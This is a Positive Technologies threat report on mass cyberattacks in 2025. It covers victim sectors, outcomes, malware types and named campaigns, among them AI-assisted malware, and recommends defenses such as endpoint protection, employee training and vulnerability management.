The evolution of mass attacks and a defense strategy

This study contains information on current global cybersecurity threats based on Positive Technologies own expertise and reputable sources.

It draws on public information about cybersecurity incidents from the first three quarters of 2025. However, some incidents may be reported long after the actual attack took place. This report reflects the most current information available at the time it was first published.

We estimate that most cyberattacks are not made public due to reputational risks. As a consequence, even companies specializing in incident investigation and analysis of hacker activity are unable to quantify the precise number of threats. Our report seeks to draw the attention of companies and individuals to the key motives and methods of cyberattacks, as well as to highlight the main trends in the changing cyberthreat landscape.

This report considers each mass attack¹ (for example, phishing emails sent to multiple addresses) as one attack, not several, regardless of the number of victims. For explanations of terms used in this report, please refer to the Positive Technologies glossary.

• In the first three quarters of 2025, one in five successful attacks against organizations (20%) was a mass attack. Each such attack can hit anywhere from dozens to several thousand victims.
• Government institutions (12%) and the manufacturing sector (9%) are the most frequent victims of mass attacks on organizations; they're also among the top targets in targeted attacks. The high value of their data, geopolitical importance, rapid digitalization, and immature security practices make government and manufacturing organizations attractive—and vulnerable—targets for cybercriminals.
• The most common outcome of mass attacks is a confidential data breach (40%). In second place is using the victim's resources for follow‑on attacks (26%)—most often DDoS using the company's infrastructure, phishing campaigns (including messages sent on the victim's behalf), and using the victim's systems to spread malware and attack customers or partners.
• Beyond direct consequences, mass attacks create systemic problems. They significantly increase the load on defenses and incident response teams. A wave of concurrent incidents can overwhelm response teams, making timely detection and containment harder.
• Malware was used in 56% of all mass attacks. This approach pays off: investments in developing or buying off‑the‑shelf malware are quickly recouped through large-scale campaigns. Another reason for the widespread use of malware is its high effectiveness and ease of application, which let attackers penetrate companies' IT infrastructure, advance their attacks, and fully compromise critical systems.
• Remote access trojans (RATs) lead among malware used in mass attacks (34%). They give attackers full control of infected devices, automate data collection, enable lateral movement and the installation of additional malware, and are also used to build botnets. All this makes RATs ideal tools for automated campaigns.
• Spyware (22%) is widely used in both mass and targeted attacks thanks to its versatility: it can covertly collect sensitive data for later monetization or use in attack chains. At the same time, miners (19%)—though still typical of mass campaigns—are becoming less profitable as crypto‑mining returns decline.
• Ransomware remains the primary tool in targeted attacks (14%), but its use in mass attacks is set to grow thanks to widely available RaaS platforms and high automation. In the near term, we expect their share to grow because of the low barrier to entry and strong revenue potential.
• Mass attacks are evolving from simple, easily detected scenarios—based on known IOCs and already disclosed vulnerabilities—to complex, adaptive campaigns that use code obfuscation, automated malware generation, and botnets with dynamic logic. These techniques help mask activity, evade signature‑based detection, and scale attacks without a high risk of rapid discovery. As a result, the line between mass and targeted attacks is increasingly blurred, and effective defense requires behavior‑based analytics, machine learning, and a combination of EPP and EDR solutions.
• Preventing social engineering and promptly remediating vulnerabilities are critical to defending against mass attacks: this requires regular employee training, email filtering, control of attachments and links, and an effective vulnerability management process.

In today's threat landscape, mass cyberattacks are among the most significant risks to organizations: in the first three quarters of 2025, one in five successful attacks against organizations (20%) was a mass attack. The scale and high degree of automation let attackers run campaigns that hit thousands of victims worldwide. In February 2025, a mass campaign by the RansomHub ransomware group was uncovered. The attackers compromised more than 600 organizations, including healthcare and financial institutions, as well as critical infrastructure. They used unique encryption methods, advanced evasion techniques, and the exploitation of known vulnerabilities. The hackers encrypted critical files and demanded ransom for decryption.

Typical signs of mass campaigns include:

• Identical indicators of compromise across many victims (for example, the same malicious files or domains)
• Sharp spikes in activity, where network scanning or connection attempts originate either from the same provider or from large numbers of distributed proxy servers
• Diverse attack targets, often limited to publicly accessible services—such as mail servers or remote access systems
• Rapid takeover of as many systems as possible rather than in‑depth reconnaissance

Nearly half of mass attacks (47%) aren't tied to a specific industry. Attackers choose targets to gain maximum reach, exploiting standard vectors of attacks and common vulnerabilities found across many organizations' infrastructures. Government institutions (12%) and manufacturing sector (9%) are the most frequent victims of mass attacks—and are also among the top victims in targeted attacks. The reasons: strategic importance, high‑value data, and systemic weaknesses in both the public sector and manufacturing.

Government institutions store confidential information about citizens, governance, and national security, which makes them prime targets for attackers. Their geopolitical role further attracts attackers, especially during periods of international tension. A clear example is the mass campaign by Hazy Hawk, which exploited misconfigured DNS records pointing to abandoned cloud services. The attackers registered new cloud resources with the same names, taking over subdomains of well‑known organizations. This automated campaign compromised dozens of trusted domains, including numerous government services, as well as corporate domains of large companies. Through these subdomains, the attackers ran phishing campaigns, distributed fake applications and malicious ads, and used the parent domains' high trust to hide their activity in search engines.

The manufacturing sector is also at heightened risk due to rapid digitalization and IT/OT integration, while cybersecurity maturity in this sector remains low. Production systems may run on outdated equipment without modern protections, and disruptions to technological processes can cause shutdowns, financial losses, or even accidents. For example, in January 2025 the Rezet group launched numerous mass attacks on manufacturing companies in Russia. Victims included companies in the chemical, food, and pharmaceutical industries. The attackers sent phishing emails with fake invitations to seminars on standardizing defense products. The emails contained an archive with a PDF and a malicious payload; running it led to system compromise.

Mass attacks can lead to serious outcomes for organizations, including non-tolerable events: breaches of confidential data, disruption of business processes, loss of control over infrastructure, and the use of compromised systems for follow‑on attacks. Although they don't target specific victims, mass attacks can cause damage comparable to targeted attacks, due to their scale and high automation.

The most common consequence is confidential data breach (40% of successful attacks on organizations). Most often, attackers steal credentials (39% of mass attacks that resulted in breaches), payment card data (14%), and trade secrets (7%). They may then sell the stolen data on underground markets—or use it in targeted attacks—creating additional risk for organizations. Data breaches can lead to legal penalties, reputational harm, and loss of partner and customer trust.

In 2025, researchers identified a campaign in which malware was delivered through fake CAPTCHA checks. On compromised sites, the EDDIESTEALER infostealer was launched on the victim's system via the "I'm not a robot" prompt. The infostealer targets sensitive data, including cryptocurrency wallet numbers, credentials from browsers, password manager databases, FTP client configurations, and conversations in messengers.

More than a quarter of mass attacks (26%) result in compromised systems being used to conduct further attacks—against both organizations and individuals (a consequence specific to mass campaigns). Most often these are DDoS attacks using the company's resources (46%), phishing on behalf of third parties or the victim (31%), use of the victim's resources to distribute malware (14%), and attacks on customers or partners (9%). In January 2025, Casio UK's online store and 17 other sites were compromised when attackers injected a hidden skimmer script into the checkout process. The script intercepted customers' credit card data and sent it to the attackers' servers. The compromised sites served as trusted platforms for collecting sensitive information, increasing user trust and reducing the chance of detection. In this way, the infected company becomes not only a victim but also a tool in the attack chain—here, a channel for stealing customer data.

Nearly one in four mass attacks disrupted core operations (24%). Mass attacks lead to loss of access to infrastructure or data, customer service disruptions, and interruptions to internal business processes. For example, the CVE‑2025‑6543 memory overflow vulnerability in Citrix was widely exploited in denial‑of‑service attacks. Several organizations in the Netherlands were attacked via this vulnerability, and the Public Prosecution Service suffered significant disruption: employees lost internet access, were unreachable by email, and Citrix systems had limited functionality.

Beyond direct damage, mass attacks create systemic issues. They sharply increase the load on defense mechanisms and incident response teams. A surge of simultaneous incidents overwhelms SOCs, CSIRTs, and MDR/EDR providers, complicating timely detection and containment of attacks. The constant flood of events generates many false positives, drains analytical resources, and contributes to employee burnout. As a result, even strong defenses can be overloaded, reducing incident response readiness and increasing the risk of critical incidents.

The main principle of mass attacks is to reach as many victims as possible at minimal cost. Malware was the attackers' primary tool, used in 56% of successful mass attacks. Highly effective, malware is relatively easy to use. It allows attackers to gain initial access, persistence, and progression in the infrastructure up to full compromise of the domain and critical systems, potentially leading to non-tolerable events. At the early stages of attacks, malware is most often used to gain initial access—via malicious email attachments, phishing sites, or vulnerability exploitation. Today's cyberthreat landscape is diverse and fast‑moving, with various tools available depending on attacker goals and resources; investments in custom or off‑the‑shelf malware are quickly recouped through large-scale campaigns.

Another reason for the widespread use of malware is its high availability: the underground market offers a wide range of ready‑made malicious tools for sale or subscription, including infostealers, loaders, RATs, and even ransomware builders under ransomware‑as‑a‑service (RaaS) models. Many tools cost from a few dozen to a few hundred dollars, and leaked manuals from well‑known groups like LockBit and Conti help even novices run complex attacks. The costs of creating or renting malware (for example, under MaaS/RaaS models) are negligible compared with potential profit—ransom, data sales, or selling access to the infrastructure. In our research on the cybercrime market, we explained how net profit from a successful cyberattack can be five times the cost of organizing it.

The most common malware distribution channel is compromising computers, servers, and network equipment (52%): attackers hack devices by bruteforcing credentials or exploiting vulnerabilities. The second channel is through websites (19.5%): infection occurs when victims visit fake or compromised resources, often via automatic malware downloads. The third popular channel is email (18.9%), which remains one of the most effective ways to deliver phishing messages with malicious attachments or links.

Remote access trojans (RATs) rank first among types of malware used in mass cyberattacks, appearing in one out of three successful attacks (34%). RATs are ideal for mass campaigns, enabling high automation, simultaneous execution, and scalability.

RATs give attackers full control over infected devices: they can execute commands, move laterally, launch other programs, collect data, and install additional malware. This makes RATs ideal for scaling: after compromising one device, an attacker can use it as an entry point to move laterally within the network or to gather information. In March 2025, Head Mare launched a wave of attacks on manufacturing companies in Russia, affecting about 100 organizations. Victims received phishing emails with ZIP attachments. As a result, the PhantomPyramid Python backdoor was installed on infected systems for remote control, along with the legitimate MeshAgent tool, which the attackers used to pose as administrative software.

Attackers also use RATs to build botnets—networks of infected devices that can be used for DDoS attacks, spam, phishing, or cryptocurrency mining. Thanks to automated control, such botnets are easy to scale: new victims join the network, and commands are pushed to all nodes at once.

Spyware and miners appeared in one out of five attacks (22% and 19%, respectively). Spyware is widely used in both mass and targeted attacks because it is so versatile, while miners are becoming less profitable as mining profits fall. Miners only make sense only when very large numbers of devices are infected: profit per device is small, but scale adds up, which is why they're popular in mass campaigns. Attackers spread them via phishing or by exploiting vulnerabilities. In targeted attacks, however, miners are rarely used because noticeable performance drops quickly attract attention.

Ransomware remains the primary tool in targeted attacks (14%), and its use in mass campaigns is also growing thanks to widely available RaaS platforms and high automation. In February 2025, Russian small and medium-sized businesses faced a new threat—PE32 ransomware, a sophisticated tool that uses post‑quantum cryptography to encrypt data in three rounds. Dozens of companies were affected, with ransom demands ranging from $500 to $150,000, payable in Bitcoin.

Technologies once employed in targeted ransomware attacks are now being adapted for mass use: underground forums increasingly offer RaaS services with ready‑made builders, manuals, and infrastructure for launching attacks. As competition grows in the dark web market, attackers upgrade their platforms with unique features and better evasion techniques to attract more partners. This lets even inexperienced attackers run high‑tech campaigns with automated delivery and defense evasion. As a result, we expect the number and share of mass attacks involving ransomware to keep growing: a low barrier to entry, strong automation, and attractive monetization opportunities make these services appealing to cybercriminals. For example, a new RaaS platform called Pay2Key appeared on Russian cybercrime forums. Built on the Mimic ransomware, it is primarily used in mass attacks but also allows attackers to target specific victims. Despite informal bans on attacks across the CIS, the attackers carried out at least three phishing campaigns against Russian companies in finance, construction, and retail. The attacks started with phishing emails containing malicious RAR attachments or links to files on Dropbox. After a self‑extracting (SFX) archive was launched, Pay2Key was downloaded to the device.

Attackers are increasingly using artificial intelligence and machine learning to prepare and conduct operations. According to our research, 5% of MITRE ATT&CK techniques already use AI, including sub‑technique T1587.001 "Develop Capabilities: Malware."

There has already been cases where AI was used to prepare mass attacks. Researchers discovered a mass campaign by the Koske group that apparently develops malware using large language models (LLMs). The attack begins by compromising a JupyterLab interactive development environment, after which malware is injected into a victim's system via JPEG images with embedded executable code. Once the file is downloaded, a two‑stage attack begins: a C library implementing a rootkit is executed in memory. At the same time, a shell script is run; it downloads and activates a cryptominer. Koske's code is highly structured and heavily commented—strong indicators of AI use. Moreover, the malware also shows adaptive behavior: it checks internet access via curl, wget, and raw TCP, automatically restores connection through proxies, and switches between mining pools. These traits suggest that AI not only helped generate code but also enabled a more autonomous, stealthy, and resilient threat.

Modern attackers increasingly pair time-tested tools with the latest hiding techniques. Beyond generating malware, criminals use language models for code obfuscation, which significantly complicates detection and analysis.

Malware development is following two paths:

• Reworking old code to extend functionality
• Improving stealth techniques to evade detection systems

In addition to obfuscation, AI can help attackers bypass existing defenses. In August 2025, ESET found an AI‑based ransomware called PromptLock on VirusTotal. The program generates Lua scripts via a GPT model on the fly, so indicators of compromise change with every run. Beyond encryption, the program can be used to steal or destroy data. Researchers later learned this program was only a proof of concept (PoC), not fully functional malware deployed in the wild. Even so, such systems are already sophisticated enough to make security specialists think they are dealing with real malware.

Another trait of the evolution of mass attacks is the rise of more sophisticated bots. Imperva's study shows that where bots were once simple and easy to spot, AI has made them adaptive and harder to detect. Attackers increasingly use generative AI and bot‑as‑a‑service (BaaS) platforms to automate the creation of malicious scripts even without deep technical skills, sharply lowering the barrier to entry for attackers. Modern bots apply machine learning to analyze defenses, mimic human activity—using fake browser fingerprints, residential proxies, and headless browsers—and retry attacks until they succeed. Traditional signature‑based measures often fall short, allowing bots to better mimic legitimate user behavior and evade detection.

Mass cyberattacks will remain common and dangerous for organizations in 2026. Automated, scalable malware campaigns are growing, and endpoints—computers, servers, and virtual desktops—are becoming the primary targets for cybercriminals. Traditional security systems used simple signatures and known vulnerabilities to detect attacks. Today's mass campaigns use code obfuscation, dynamic generation of malicious files, botnets with adaptive logic, and multi‑stage infection chains. These techniques evade static, signature‑based detection, blend in with normal activity, and scale quickly. Effective defense requires a comprehensive approach to endpoint security.

According to AV‑TEST, more than 450,000 new malicious programs and potentially unwanted applications appear every day. The AV‑ATLAS database now tracks over 800 million known samples, and the total number of new threats grows steadily year over year. Traditional antivirus software based solely on signature analysis can no longer provide adequate protection; it can't keep up with the pace of new threats. Even heuristic analysis falls short against AI‑driven obfuscation and polymorphic code.

Modern endpoint protection platforms (EPP) have overtaken old methods as the first—and most critical—line of defense. EPP solutions combine multiple technologies: a signature‑ and heuristic‑based AV engine, malware behavior emulation for detection and blocking, ransomware protection, device and application control, and network threat protection.

Today's EPPs should deliver a multilayered approach and fast response. To be effective, an EPP should include signatures from the past three to four years covering all major malware families.

Given that roughly half a million new threats emerge daily, both the size of the threat database and its update speed are critical. The more frequently new signatures and indicators reach agents, the faster the system can detect new threats. Ideally, updates should be delivered several times per day.

While technology is essential, endpoint security also depends on people. Many mass attacks start with phishing emails carrying malicious attachments or links. Countering social engineering is a key part of endpoint protection, making regular employee training, phishing simulations, and email filtering vital. Efficient vulnerability management also improves endpoint security. Endpoint defenses should be integrated into vulnerability remediation processes to enable automated scanning, provide an accurate assessment of existing vulnerabilities, and facilitate remediation control.